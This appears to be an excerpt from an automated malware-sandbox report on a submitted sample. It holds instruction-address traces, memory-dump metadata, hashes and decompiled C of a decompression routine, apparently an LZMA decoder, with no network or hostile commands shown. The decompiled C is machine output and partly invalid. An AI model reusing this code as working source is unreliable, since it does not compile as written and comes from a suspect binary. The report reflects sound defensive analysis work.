0x0040712f
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x00000000
0x00000000
0x00407234
0x00407234
0x00407238
0x0040725a
0x0040725a
0x0040725d
0x00407267
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040723a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x0040732f
0x00407332
0x00407339
0x00000000
0x0040733c
0x004072f7
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e2
0x004073e5
0x004072e6
0x004072e6
0x004072e6
0x00000000
0x004072ec
0x00000000
0x0040701c
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x0040733c
0x00000000
0x00000000
0x00000000
0x00407061
0x00407061
0x00407064
0x0040709a
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fa
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00407462
0x00000000
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000
0x00407499
0x004072e6
0x00407366
0x0040732f

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00407234 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407234() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
